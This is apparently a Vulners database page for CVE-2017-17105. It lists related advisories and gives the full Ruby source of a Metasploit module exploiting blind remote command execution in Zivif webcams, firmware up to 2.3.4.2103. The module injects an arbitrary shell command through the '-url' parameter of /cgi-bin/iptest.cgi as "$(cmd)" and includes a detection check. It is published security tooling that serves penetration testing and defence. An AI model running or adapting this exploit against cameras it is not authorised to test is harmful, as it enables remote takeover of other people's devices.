| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| Zivif Camera 2.3.4.2103 iptest.cgi Blind Remote Command Execution | 21 Jun 202009:03 | – | 0daydb | |
| Zivif PR115-204-P-RS 2.3.4.2103 Bypass / Command Injection / Hardcoded Password Vulnerabilities | 14 Dec 201700:00 | – | zdt | |
| Zivif Camera 2.3.4.2103 iptest.cgi Blind Remote Command Execution Exploit | 16 Jun 202000:00 | – | zdt | |
| CVE-2017-17105 | 19 Dec 201700:00 | – | attackerkb | |
| CVE-2017-17105 | 16 Jun 202012:15 | – | circl | |
| Zivif PR115-204-P-RS Remote Command Injection Vulnerability | 2 Jan 201800:00 | – | cnvd | |
| CVE-2017-17105 | 18 Dec 201717:00 | – | cve | |
| CVE-2017-17105 | 18 Dec 201717:00 | – | cvelist | |
| Microsoft research uncovers new Zerobot capabilities | 21 Dec 202220:00 | – | mmpc | |
| Microsoft research uncovers new Zerobot capabilities | 21 Dec 202220:00 | – | mssecure |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Zivif Camera iptest.cgi Blind Remote Command Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in Zivif
webcams. This is known to impact versions prior to and including v2.3.4.2103.
Exploit was reported in CVE-2017-17105.
},
'License' => MSF_LICENSE,
'Author' => [ 'Silas Cutler (p1nk)' ],
'References' => [
[ 'URL', 'https://seclists.org/fulldisclosure/2017/Dec/42' ],
[ 'CVE', '2017-17105' ]
],
'Platform' => 'unix',
'Targets' => [
[ 'Automatic Target', {}]
],
'Payload' => {
'Space' => 1024,
'BadChars' => "\x00\x27",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic'
}
},
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/generic'
},
'Privileged' => false,
'DisclosureDate' => '2017-09-01',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ]
}
)
)
end
def check
res = send_request_cgi('uri' => normalize_uri('cgi-bin', 'iptest.cgi'))
unless res
vprint_error('Connection failed')
return Exploit::CheckCode::Unknown
end
unless res.code && res.code == 200
return CheckCode::Safe
end
CheckCode::Detected
end
def exploit
print_status('Sending request')
cmd = datastore['CMD']
res = send_request_cgi(
'uri' => normalize_uri('cgi-bin', 'iptest.cgi'),
'method' => 'GET',
'vars_get' => {
'cmd' => 'iptest.cgi',
'-time' => Time.now.to_i,
'-url' => "$(#{cmd})"
}
)
unless res
fail_with(Failure::Unreachable, 'Connection failed')
end
if res.code && res.code == 200
print_good('Command sent successfully')
else
fail_with(Failure::UnexpectedReply, 'Unable to send command to target')
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation